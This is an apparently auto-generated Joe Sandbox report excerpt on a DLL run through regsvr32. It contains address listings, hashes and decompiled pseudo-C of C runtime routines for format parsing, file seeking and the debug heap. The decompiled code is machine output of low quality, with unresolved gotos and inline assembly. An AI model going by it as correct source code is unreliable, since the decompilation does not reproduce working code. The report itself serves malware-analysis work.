                                                                    0x7fef9d3dcdd
                                                                    0x7fef9d3dce7
                                                                    0x7fef9d3dce9
                                                                    0x7fef9d3dcf2
                                                                    0x7fef9d3dcf6
                                                                    0x7fef9d3dcff
                                                                    0x7fef9d3dd03
                                                                    0x7fef9d3dd0c
                                                                    0x7fef9d3dd10
                                                                    0x7fef9d3dd16
                                                                    0x7fef9d3dd1e
                                                                    0x7fef9d3dd27
                                                                    0x7fef9d3dd3b
                                                                    0x7fef9d3dd3d
                                                                    0x7fef9d3dd4a
                                                                    0x7fef9d3dd53
                                                                    0x7fef9d3dd5c
                                                                    0x7fef9d3dd66
                                                                    0x7fef9d3dd6a
                                                                    0x7fef9d3dd7f
                                                                    0x7fef9d3dd88
                                                                    0x7fef9d3dda0
                                                                    0x7fef9d3dda2
                                                                    0x7fef9d3ddaf
                                                                    0x7fef9d3ddb8
                                                                    0x7fef9d3ddba
                                                                    0x7fef9d3ddc2
                                                                    0x7fef9d3ddd7
                                                                    0x7fef9d3dde8
                                                                    0x7fef9d3ddf7
                                                                    0x7fef9d3de01
                                                                    0x7fef9d3de0f
                                                                    0x7fef9d3de19
                                                                    0x7fef9d3de1f
                                                                    0x7fef9d3de32
                                                                    0x7fef9d3de40
                                                                    0x7fef9d3de4c
                                                                    0x7fef9d3de54
                                                                    0x7fef9d3de5d
                                                                    0x7fef9d3de61
                                                                    0x7fef9d3de6a
                                                                    0x7fef9d3de80
                                                                    0x7fef9d3de91
                                                                    0x7fef9d3de9f
                                                                    0x7fef9d3deab
                                                                    0x7fef9d3deb3
                                                                    0x7fef9d3dec6
                                                                    0x7fef9d3ded7
                                                                    0x7fef9d3dee5
                                                                    0x7fef9d3def1
                                                                    0x7fef9d3def9
                                                                    0x7fef9d3df09
                                                                    0x7fef9d3df19
                                                                    0x7fef9d3df29
                                                                    0x7fef9d3df39
                                                                    0x7fef9d3df49
                                                                    0x7fef9d3df59
                                                                    0x7fef9d3df5b
                                                                    0x7fef9d3df5d
                                                                    0x7fef9d3df68
                                                                    0x7fef9d3df6d
                                                                    0x7fef9d3df76
                                                                    0x7fef9d3df7a
                                                                    0x7fef9d3df80
                                                                    0x7fef9d3df95
                                                                    0x7fef9d3dfa6
                                                                    0x7fef9d3dfb5
                                                                    0x7fef9d3dfdc

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                                                    • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                    • API String ID: 2192614184-734865713
                                                                    • Opcode ID: d839b4f8492d9702b4695783724771f139c243a43186ab9091008b35e86c7283
                                                                    • Instruction ID: 2534415b6cec3e8c7a7064d8bee2958269565171124d4a2b4bf05b50673a9d36
                                                                    • Opcode Fuzzy Hash: d839b4f8492d9702b4695783724771f139c243a43186ab9091008b35e86c7283
                                                                    • Instruction Fuzzy Hash: 4C411CB2A0C6C18AE3B0CB64E8447BEB7E0F384345F600125E6D987AA8DB7DD444CF14
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 28%
                                                                    			E000007FE7FEF9D3DC41(intOrPtr _a76, signed int _a80, signed int _a88, signed int _a92, signed int _a108, signed int _a112, intOrPtr _a116, char _a1200, signed int _a1208, intOrPtr _a1216, signed int _a1404, signed int _a1408, signed int _a1412, intOrPtr _a1536, signed short* _a1544, char _a1560) {
                                                                    				void* _t190;
                                                                    				char* _t210;
                                                                    				char* _t211;
                                                                    
                                                                    				_a76 = 1;
                                                                    				E000007FE7FEF9D3EE40(_a1208 & 0x0000ffff, _a1536,  &_a1200);
                                                                    				_a112 = 0;
                                                                    				_a108 = _a112;
                                                                    				_a88 = _a108;
                                                                    				_a92 = _a88;
                                                                    				_a80 = 0;
                                                                    				_a116 = 0xffffffff;
                                                                    				_a76 = 0;
                                                                    				_a1404 = _a1208 & 0x0000ffff;
                                                                    				if (_a1404 == 0x20) goto 0xf9d3dd05;
                                                                    				if (_a1404 == 0x23) goto 0xf9d3dd12;
                                                                    				if (_a1404 == 0x2b) goto 0xf9d3dcf8;
                                                                    				if (_a1404 == 0x2d) goto 0xf9d3dceb;
                                                                    				if (_a1404 == 0x30) goto 0xf9d3dd20;
                                                                    				goto 0xf9d3dd2b;
                                                                    				_a80 = _a80 | 0x00000004;
                                                                    				goto 0xf9d3dd2b;
                                                                    				_a80 = _a80 | 0x00000001;
                                                                    				goto 0xf9d3dd2b;
                                                                    				_a80 = _a80 | 0x00000002;
                                                                    				goto 0xf9d3dd2b;
                                                                    				asm("bts eax, 0x7");
                                                                    				goto 0xf9d3dd2b;
                                                                    				_a80 = _a80 | 0x00000008;
                                                                    				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0xf9d3dd6c;
                                                                    				_t210 =  &_a1560;
                                                                    				_a88 = E000007FE7FEF9D31E40(_t210);
                                                                    				if (_a88 >= 0) goto 0xf9d3dd6a;
                                                                    				_a80 = _a80 | 0x00000004;
                                                                    				_a88 =  ~_a88;
                                                                    				goto 0xf9d3dd83;
                                                                    				_a88 = _t190 + _t210 - 0x30;
                                                                    				_a116 = 0;
                                                                    				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0xf9d3ddc4;
                                                                    				_t211 =  &_a1560;
                                                                    				_a116 = E000007FE7FEF9D31E40(_t211);
                                                                    				if (_a116 >= 0) goto 0xf9d3ddc2;
                                                                    				_a116 = 0xffffffff;
                                                                    				goto 0xf9d3dddb;
                                                                    				_a116 = _t190 + _t211 - 0x30;
                                                                    				_a1408 = _a1208 & 0x0000ffff;
                                                                    				if (_a1408 == 0x49) goto 0xf9d3de66;
                                                                    				if (_a1408 == 0x68) goto 0xf9d3df6f;
                                                                    				if (_a1408 == 0x6c) goto 0xf9d3de24;
                                                                    				if (_a1408 == 0x77) goto 0xf9d3df7c;
                                                                    				goto 0xf9d3df88;
                                                                    				if (( *_a1544 & 0x0000ffff) != 0x6c) goto 0xf9d3de56;
                                                                    				_a1544 =  &(_a1544[1]);
                                                                    				asm("bts eax, 0xc");
                                                                    				goto 0xf9d3de61;
                                                                    				_a80 = _a80 | 0x00000010;
                                                                    				goto 0xf9d3df88;
                                                                    				asm("bts eax, 0xf");
                                                                    				if (( *_a1544 & 0x0000ffff) != 0x36) goto 0xf9d3deb8;
                                                                    				if ((_a1544[1] & 0x0000ffff) != 0x34) goto 0xf9d3deb8;
                                                                    				_a1544 =  &(_a1544[2]);
                                                                    				asm("bts eax, 0xf");
                                                                    				goto 0xf9d3df6d;
                                                                    				if (( *_a1544 & 0x0000ffff) != 0x33) goto 0xf9d3defb;
                                                                    				if ((_a1544[1] & 0x0000ffff) != 0x32) goto 0xf9d3defb;
                                                                    				_a1544 =  &(_a1544[2]);
                                                                    				asm("btr eax, 0xf");
                                                                    				goto 0xf9d3df6d;
                                                                    				if (( *_a1544 & 0x0000ffff) == 0x64) goto 0xf9d3df5b;
                                                                    				if (( *_a1544 & 0x0000ffff) == 0x69) goto 0xf9d3df5b;
                                                                    				if (( *_a1544 & 0x0000ffff) == 0x6f) goto 0xf9d3df5b;
                                                                    				if (( *_a1544 & 0x0000ffff) == 0x75) goto 0xf9d3df5b;
                                                                    				if (( *_a1544 & 0x0000ffff) == 0x78) goto 0xf9d3df5b;
                                                                    				if (( *_a1544 & 0x0000ffff) != 0x58) goto 0xf9d3df5d;
                                                                    				goto 0xf9d3df6d;
                                                                    				_a1216 = 0;
                                                                    				goto E000007FE7FEF9D3DC41;
                                                                    				goto 0xf9d3df88;
                                                                    				_a80 = _a80 | 0x00000020;
                                                                    				goto 0xf9d3df88;
                                                                    				asm("bts eax, 0xb");
                                                                    				_a1412 = _a1208 & 0x0000ffff;
                                                                    				_a1412 = _a1412 - 0x41;
                                                                    				if (_a1412 - 0x37 > 0) goto 0xf9d3ea2a;
                                                                    				goto __rax;
                                                                    			}






                                                                    0x7fef9d3dc41
                                                                    0x7fef9d3dc61
                                                                    0x7fef9d3dc6b
                                                                    0x7fef9d3dc77
                                                                    0x7fef9d3dc7f
                                                                    0x7fef9d3dc87
                                                                    0x7fef9d3dc8b
                                                                    0x7fef9d3dc93
                                                                    0x7fef9d3dc9b
                                                                    0x7fef9d3dcb0
                                                                    0x7fef9d3dcbf
                                                                    0x7fef9d3dcc9
                                                                    0x7fef9d3dcd3
                                                                    0x7fef9d3dcdd
                                                                    0x7fef9d3dce7
                                                                    0x7fef9d3dce9
                                                                    0x7fef9d3dcf2
                                                                    0x7fef9d3dcf6
                                                                    0x7fef9d3dcff
                                                                    0x7fef9d3dd03
                                                                    0x7fef9d3dd0c
                                                                    0x7fef9d3dd10
                                                                    0x7fef9d3dd16
                                                                    0x7fef9d3dd1e
                                                                    0x7fef9d3dd27
                                                                    0x7fef9d3dd3b
                                                                    0x7fef9d3dd3d
                                                                    0x7fef9d3dd4a
                                                                    0x7fef9d3dd53
                                                                    0x7fef9d3dd5c
                                                                    0x7fef9d3dd66
                                                                    0x7fef9d3dd6a
                                                                    0x7fef9d3dd7f
                                                                    0x7fef9d3dd88
                                                                    0x7fef9d3dda0
                                                                    0x7fef9d3dda2
                                                                    0x7fef9d3ddaf
                                                                    0x7fef9d3ddb8
                                                                    0x7fef9d3ddba
                                                                    0x7fef9d3ddc2
                                                                    0x7fef9d3ddd7
                                                                    0x7fef9d3dde8
                                                                    0x7fef9d3ddf7
                                                                    0x7fef9d3de01
                                                                    0x7fef9d3de0f
                                                                    0x7fef9d3de19
                                                                    0x7fef9d3de1f
                                                                    0x7fef9d3de32
                                                                    0x7fef9d3de40
                                                                    0x7fef9d3de4c
                                                                    0x7fef9d3de54
                                                                    0x7fef9d3de5d
                                                                    0x7fef9d3de61
                                                                    0x7fef9d3de6a
                                                                    0x7fef9d3de80
                                                                    0x7fef9d3de91
                                                                    0x7fef9d3de9f
                                                                    0x7fef9d3deab
                                                                    0x7fef9d3deb3
                                                                    0x7fef9d3dec6
                                                                    0x7fef9d3ded7
                                                                    0x7fef9d3dee5
                                                                    0x7fef9d3def1
                                                                    0x7fef9d3def9
                                                                    0x7fef9d3df09
                                                                    0x7fef9d3df19
                                                                    0x7fef9d3df29
                                                                    0x7fef9d3df39
                                                                    0x7fef9d3df49
                                                                    0x7fef9d3df59
                                                                    0x7fef9d3df5b
                                                                    0x7fef9d3df5d
                                                                    0x7fef9d3df68
                                                                    0x7fef9d3df6d
                                                                    0x7fef9d3df76
                                                                    0x7fef9d3df7a
                                                                    0x7fef9d3df80
                                                                    0x7fef9d3df95
                                                                    0x7fef9d3dfa6
                                                                    0x7fef9d3dfb5
                                                                    0x7fef9d3dfdc

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                                                    • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                    • API String ID: 2192614184-734865713
                                                                    • Opcode ID: 00c8469e1271fc8907031e5201d4ef955f45b92ddfc689a069c686c98e5ea265
                                                                    • Instruction ID: 4e41d9db2091814ce308bd8b3badba688d1355b6a5e36393cab3bd2279fd69d5
                                                                    • Opcode Fuzzy Hash: 00c8469e1271fc8907031e5201d4ef955f45b92ddfc689a069c686c98e5ea265
                                                                    • Instruction Fuzzy Hash: 01412AB2A0C6C286E7F09B64E8407BEB2E4F384346F600126D6CD876A9DB3ED444CF14
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 24%
                                                                    			E000007FE7FEF9D3BDDA(signed int _a80, intOrPtr _a116, signed int _a696, intOrPtr _a704, char _a972, signed int _a976, void* _a1096, char _a1112) {
                                                                    				void* _t114;
                                                                    				char* _t134;
                                                                    
                                                                    				_a116 = 0;
                                                                    				if (_a696 != 0x2a) goto 0xf9d3be16;
                                                                    				_t134 =  &_a1112;
                                                                    				_a116 = E000007FE7FEF9D31E40(_t134);
                                                                    				if (_a116 >= 0) goto 0xf9d3be14;
                                                                    				_a116 = 0xffffffff;
                                                                    				goto 0xf9d3be2d;
                                                                    				_a116 = _t114 + _t134 - 0x30;
                                                                    				_a972 = _a696 & 0x000000ff;
                                                                    				if (_a972 == 0x49) goto 0xf9d3beb7;
                                                                    				if (_a972 == 0x68) goto 0xf9d3bfc0;
                                                                    				if (_a972 == 0x6c) goto 0xf9d3be76;
                                                                    				if (_a972 == 0x77) goto 0xf9d3bfcd;
                                                                    				goto 0xf9d3bfd9;
                                                                    				if ( *_a1096 != 0x6c) goto 0xf9d3bea7;
                                                                    				_a1096 = _a1096 + 1;
                                                                    				asm("bts eax, 0xc");
                                                                    				goto 0xf9d3beb2;
                                                                    				_a80 = _a80 | 0x00000010;
                                                                    				goto 0xf9d3bfd9;
                                                                    				asm("bts eax, 0xf");
                                                                    				if ( *_a1096 != 0x36) goto 0xf9d3bf09;
                                                                    				if ( *((char*)(_a1096 + 1)) != 0x34) goto 0xf9d3bf09;
                                                                    				_a1096 = _a1096 + 2;
                                                                    				asm("bts eax, 0xf");
                                                                    				goto 0xf9d3bfbe;
                                                                    				if ( *_a1096 != 0x33) goto 0xf9d3bf4c;
                                                                    				if ( *((char*)(_a1096 + 1)) != 0x32) goto 0xf9d3bf4c;
                                                                    				_a1096 = _a1096 + 2;
                                                                    				asm("btr eax, 0xf");
                                                                    				goto 0xf9d3bfbe;
                                                                    				if ( *_a1096 == 0x64) goto 0xf9d3bfac;
                                                                    				if ( *_a1096 == 0x69) goto 0xf9d3bfac;
                                                                    				if ( *_a1096 == 0x6f) goto 0xf9d3bfac;
                                                                    				if ( *_a1096 == 0x75) goto 0xf9d3bfac;
                                                                    				if ( *_a1096 == 0x78) goto 0xf9d3bfac;
                                                                    				if ( *_a1096 != 0x58) goto 0xf9d3bfae;
                                                                    				goto 0xf9d3bfbe;
                                                                    				_a704 = 0;
                                                                    				goto E000007FE7FEF9D3BB66;
                                                                    				goto 0xf9d3bfd9;
                                                                    				_a80 = _a80 | 0x00000020;
                                                                    				goto 0xf9d3bfd9;
                                                                    				asm("bts eax, 0xb");
                                                                    				_a976 = _a696;
                                                                    				_a976 = _a976 - 0x41;
                                                                    				if (_a976 - 0x37 > 0) goto 0xf9d3ca31;
                                                                    				goto __rax;
                                                                    			}





                                                                    0x7fef9d3bdda
                                                                    0x7fef9d3bdf2
                                                                    0x7fef9d3bdf4
                                                                    0x7fef9d3be01
                                                                    0x7fef9d3be0a
                                                                    0x7fef9d3be0c
                                                                    0x7fef9d3be14
                                                                    0x7fef9d3be29
                                                                    0x7fef9d3be3a
                                                                    0x7fef9d3be49
                                                                    0x7fef9d3be53
                                                                    0x7fef9d3be61
                                                                    0x7fef9d3be6b
                                                                    0x7fef9d3be71
                                                                    0x7fef9d3be84
                                                                    0x7fef9d3be91
                                                                    0x7fef9d3be9d
                                                                    0x7fef9d3bea5
                                                                    0x7fef9d3beae
                                                                    0x7fef9d3beb2
                                                                    0x7fef9d3bebb
                                                                    0x7fef9d3bed1
                                                                    0x7fef9d3bee2
                                                                    0x7fef9d3bef0
                                                                    0x7fef9d3befc
                                                                    0x7fef9d3bf04
                                                                    0x7fef9d3bf17
                                                                    0x7fef9d3bf28
                                                                    0x7fef9d3bf36
                                                                    0x7fef9d3bf42
                                                                    0x7fef9d3bf4a
                                                                    0x7fef9d3bf5a
                                                                    0x7fef9d3bf6a
                                                                    0x7fef9d3bf7a
                                                                    0x7fef9d3bf8a
                                                                    0x7fef9d3bf9a
                                                                    0x7fef9d3bfaa
                                                                    0x7fef9d3bfac
                                                                    0x7fef9d3bfae
                                                                    0x7fef9d3bfb9
                                                                    0x7fef9d3bfbe
                                                                    0x7fef9d3bfc7
                                                                    0x7fef9d3bfcb
                                                                    0x7fef9d3bfd1
                                                                    0x7fef9d3bfe6
                                                                    0x7fef9d3bff7
                                                                    0x7fef9d3c006
                                                                    0x7fef9d3c02d

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                                                    • String ID: ("Incorrect format specifier", 0)$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                    • API String ID: 2192614184-192189897
                                                                    • Opcode ID: 0dcb35cdac88f8f65d488c6c387acf7a3a87c9c5c0c9a15f6f87c725b9d0fc3a
                                                                    • Instruction ID: 25f4969c447c8d4d660c638a7323c6370fe89c3a0b7b258112d187f79a668fd6
                                                                    • Opcode Fuzzy Hash: 0dcb35cdac88f8f65d488c6c387acf7a3a87c9c5c0c9a15f6f87c725b9d0fc3a
                                                                    • Instruction Fuzzy Hash: ED416E72A0DAC28AE3F0DB24E8547BEB7E4E384345F600126D6DD869A9DB7ED140CF10
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 24%
                                                                    			E000007FE7FEF9D3DD88(signed int _a80, intOrPtr _a116, signed int _a1208, intOrPtr _a1216, signed int _a1408, signed int _a1412, signed short* _a1544, char _a1560) {
                                                                    				void* _t114;
                                                                    				char* _t134;
                                                                    
                                                                    				_a116 = 0;
                                                                    				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0xf9d3ddc4;
                                                                    				_t134 =  &_a1560;
                                                                    				_a116 = E000007FE7FEF9D31E40(_t134);
                                                                    				if (_a116 >= 0) goto 0xf9d3ddc2;
                                                                    				_a116 = 0xffffffff;
                                                                    				goto 0xf9d3dddb;
                                                                    				_a116 = _t114 + _t134 - 0x30;
                                                                    				_a1408 = _a1208 & 0x0000ffff;
                                                                    				if (_a1408 == 0x49) goto 0xf9d3de66;
                                                                    				if (_a1408 == 0x68) goto 0xf9d3df6f;
                                                                    				if (_a1408 == 0x6c) goto 0xf9d3de24;
                                                                    				if (_a1408 == 0x77) goto 0xf9d3df7c;
                                                                    				goto 0xf9d3df88;
                                                                    				if (( *_a1544 & 0x0000ffff) != 0x6c) goto 0xf9d3de56;
                                                                    				_a1544 =  &(_a1544[1]);
                                                                    				asm("bts eax, 0xc");
                                                                    				goto 0xf9d3de61;
                                                                    				_a80 = _a80 | 0x00000010;
                                                                    				goto 0xf9d3df88;
                                                                    				asm("bts eax, 0xf");
                                                                    				if (( *_a1544 & 0x0000ffff) != 0x36) goto 0xf9d3deb8;
                                                                    				if ((_a1544[1] & 0x0000ffff) != 0x34) goto 0xf9d3deb8;
                                                                    				_a1544 =  &(_a1544[2]);
                                                                    				asm("bts eax, 0xf");
                                                                    				goto 0xf9d3df6d;
                                                                    				if (( *_a1544 & 0x0000ffff) != 0x33) goto 0xf9d3defb;
                                                                    				if ((_a1544[1] & 0x0000ffff) != 0x32) goto 0xf9d3defb;
                                                                    				_a1544 =  &(_a1544[2]);
                                                                    				asm("btr eax, 0xf");
                                                                    				goto 0xf9d3df6d;
                                                                    				if (( *_a1544 & 0x0000ffff) == 0x64) goto 0xf9d3df5b;
                                                                    				if (( *_a1544 & 0x0000ffff) == 0x69) goto 0xf9d3df5b;
                                                                    				if (( *_a1544 & 0x0000ffff) == 0x6f) goto 0xf9d3df5b;
                                                                    				if (( *_a1544 & 0x0000ffff) == 0x75) goto 0xf9d3df5b;
                                                                    				if (( *_a1544 & 0x0000ffff) == 0x78) goto 0xf9d3df5b;
                                                                    				if (( *_a1544 & 0x0000ffff) != 0x58) goto 0xf9d3df5d;
                                                                    				goto 0xf9d3df6d;
                                                                    				_a1216 = 0;
                                                                    				goto E000007FE7FEF9D3DC41;
                                                                    				goto 0xf9d3df88;
                                                                    				_a80 = _a80 | 0x00000020;
                                                                    				goto 0xf9d3df88;
                                                                    				asm("bts eax, 0xb");
                                                                    				_a1412 = _a1208 & 0x0000ffff;
                                                                    				_a1412 = _a1412 - 0x41;
                                                                    				if (_a1412 - 0x37 > 0) goto 0xf9d3ea2a;
                                                                    				goto __rax;
                                                                    			}





                                                                    0x7fef9d3dd88
                                                                    0x7fef9d3dda0
                                                                    0x7fef9d3dda2
                                                                    0x7fef9d3ddaf
                                                                    0x7fef9d3ddb8
                                                                    0x7fef9d3ddba
                                                                    0x7fef9d3ddc2
                                                                    0x7fef9d3ddd7
                                                                    0x7fef9d3dde8
                                                                    0x7fef9d3ddf7
                                                                    0x7fef9d3de01
                                                                    0x7fef9d3de0f
                                                                    0x7fef9d3de19
                                                                    0x7fef9d3de1f
                                                                    0x7fef9d3de32
                                                                    0x7fef9d3de40
                                                                    0x7fef9d3de4c
                                                                    0x7fef9d3de54
                                                                    0x7fef9d3de5d
                                                                    0x7fef9d3de61
                                                                    0x7fef9d3de6a
                                                                    0x7fef9d3de80
                                                                    0x7fef9d3de91
                                                                    0x7fef9d3de9f
                                                                    0x7fef9d3deab
                                                                    0x7fef9d3deb3
                                                                    0x7fef9d3dec6
                                                                    0x7fef9d3ded7
                                                                    0x7fef9d3dee5
                                                                    0x7fef9d3def1
                                                                    0x7fef9d3def9
                                                                    0x7fef9d3df09
                                                                    0x7fef9d3df19
                                                                    0x7fef9d3df29
                                                                    0x7fef9d3df39
                                                                    0x7fef9d3df49
                                                                    0x7fef9d3df59
                                                                    0x7fef9d3df5b
                                                                    0x7fef9d3df5d
                                                                    0x7fef9d3df68
                                                                    0x7fef9d3df6d
                                                                    0x7fef9d3df76
                                                                    0x7fef9d3df7a
                                                                    0x7fef9d3df80
                                                                    0x7fef9d3df95
                                                                    0x7fef9d3dfa6
                                                                    0x7fef9d3dfb5
                                                                    0x7fef9d3dfdc

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                                                    • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                    • API String ID: 2192614184-734865713
                                                                    • Opcode ID: c688226ec199b2b9f0c59a43de4c80c1eb2ed98f75eb3809899ea6a1a3543fc2
                                                                    • Instruction ID: 6afb929124b84414141dd4680376ccf7afecd9c4b7d6d92296aea7179b7f5a27
                                                                    • Opcode Fuzzy Hash: c688226ec199b2b9f0c59a43de4c80c1eb2ed98f75eb3809899ea6a1a3543fc2
                                                                    • Instruction Fuzzy Hash: 024109A2A0C6C286E7F09B64E8447BEB6E4F394346F600126D6CD876A5DB3ED444DF14
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    • f:\dd\vctools\crt_bld\self_64_amd64\crt\src\lseeki64.c, xrefs: 000007FEF9D39578
                                                                    • ("Invalid file descriptor. File possibly closed by a different thread",0), xrefs: 000007FEF9D39563
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorFileLastPointer__doserrno_dosmaperr
                                                                    • String ID: ("Invalid file descriptor. File possibly closed by a different thread",0)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\lseeki64.c
                                                                    • API String ID: 275287319-2412454244
                                                                    • Opcode ID: 9dbe059b54c234531181e61fbc079bb475f6c20a5a1a356ebb7b18ccdd590da7
                                                                    • Instruction ID: f463794f61061979348d28cf0890255f55ae464b61bc66257c006d95a81b41bb
                                                                    • Opcode Fuzzy Hash: 9dbe059b54c234531181e61fbc079bb475f6c20a5a1a356ebb7b18ccdd590da7
                                                                    • Instruction Fuzzy Hash: A8316372A18B85C6D790CB28E88066E77A1F7857A5F604325E6FE47AF9CB3DD441CB00
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_unlock
                                                                    • String ID: (fNewBits==_CRTDBG_REPORT_FLAG) || ((fNewBits & 0x0ffff & ~(_CRTDBG_ALLOC_MEM_DF | _CRTDBG_DELAY_FREE_MEM_DF | _CRTDBG_CHECK_ALWAY$_CrtSetDbgFlag$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c
                                                                    • API String ID: 2816345473-1282596470
                                                                    • Opcode ID: db3a677d4455786e2b88604055b88d75c0eb5ecf603a90f053d8ba1f75c85f5c
                                                                    • Instruction ID: 0c290ab1c852a48438f6a901ce88093280091c3cb9967e086700a94ae8aeefb6
                                                                    • Opcode Fuzzy Hash: db3a677d4455786e2b88604055b88d75c0eb5ecf603a90f053d8ba1f75c85f5c
                                                                    • Instruction Fuzzy Hash: 18313371D1D2428AE3A08B68ED4476E77E0F741364F615236A6CD866F4D77EE4488B00
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
